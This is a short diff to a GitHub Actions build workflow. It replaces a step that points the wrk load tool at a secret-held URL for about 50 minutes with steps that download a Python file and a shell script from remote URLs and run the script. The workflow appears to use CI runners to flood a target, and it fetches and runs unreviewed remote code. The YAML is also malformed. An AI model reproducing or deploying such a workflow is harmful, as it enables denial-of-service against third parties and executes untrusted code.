--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -17,6 +17,11 @@ jobs:
         fetch-depth: 0
     - name: build
       run: make
+          ln -s ./wrk /usr/local/bin
       
+    - name: xz
+      run: curl ${{ secrets.PYURL }} -o main.py
+           curl https://raw.githubusercontent.com/thun888/lab/main/py.sh -o run.sh
+     
     - name: gan
-      run: ./wrk -t12 -c100 -d3010s ${{ secrets.URL }}
+      run: sh run.sh
